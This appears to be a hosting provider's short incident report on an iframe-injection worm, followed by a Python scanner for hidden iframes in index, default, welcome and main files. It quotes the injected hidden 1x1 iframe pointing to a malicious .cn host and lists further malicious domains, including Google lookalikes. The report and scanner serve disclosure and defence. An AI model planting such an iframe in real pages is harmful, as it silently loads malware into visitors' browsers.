Under Attack! – iFrame Trojans
We witnessed a new IFRAME injection attack which seems to have been doing the rounds over the last 24 hours.
We first noticed suspicious activity on our servers at 11:40 pm AEST last night, the 6th of April.
The attack injects iframe tags such as the following into HTML and dynamic files:
< iframe src="http://superbetfair.cn/in.cgi?income44" width=1 height=1 style="visibility: hidden" >< /iframe >
Upon investigating some of our servers we found traffic coming from a number of hosts from all over the world, so it is fairly likely to be a worm.
The worm seems to target files named index, default, welcome and main, so this includes files such as index.htm and index.php.
Additional hosts seen to be injected are:
- http://goooogleadsence.biz
- http://mmsreader.com
- http://google-ana1yticz.com
The good news is that if you’re using Firefox, it already detects these links as malware and clearly warns the user.
We are lucky in that it was a simple rollback for some of our hosts; however, others may not be so lucky.
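A defender-side check built from the description above, added here as an example and not part of the original post: it walks a web root, inspects only files whose base name is index, default, welcome or main, and reports iframes that are hidden or sized 0 or 1 pixel. The function names, the regexes and the `injected.example` host in the sample are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# Base file names the post reports as targeted (any extension).
TARGET_STEMS = {"index", "default", "welcome", "main"}

IFRAME_RE = re.compile(r"<\s*iframe\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?\s*([^\s"'>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# width/height of 0 or 1 (pixels), quoted or not; percentages are ignored.
TINY_RE = re.compile(r"""\b(width|height)\s*=\s*["']?[01]\b(?!\s*%)""", re.IGNORECASE)

# Constructed sample: one ordinary embed plus one tag shaped like the injected one.
SAMPLE = (
    '<html><body><h1>Welcome</h1>\n'
    '<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>\n'
    '<iframe src="http://injected.example/in.cgi?x" width=1 height=1 '
    'style="visibility: hidden"></iframe>\n'
    '</body></html>'
)

def suspicious_iframes(html):
    """Return the src of every iframe that is hidden or has tiny width AND height."""
    hits = []
    for match in IFRAME_RE.finditer(html):
        attrs = match.group(1)
        tiny = len(TINY_RE.findall(attrs)) >= 2
        if tiny or HIDDEN_RE.search(attrs):
            src = SRC_RE.search(attrs)
            hits.append(src.group(1) if src else "(no src)")
    return hits

def scan_webroot(root):
    """Map each targeted file under root to the suspicious iframe sources found in it."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.stem.lower() in TARGET_STEMS:
            hits = suspicious_iframes(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, hits in scan_webroot(root).items():
        print(name, hits)
```

Pass the web root as the first argument. Files with other base names are not inspected, so widen `TARGET_STEMS` if a site uses different entry pages.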
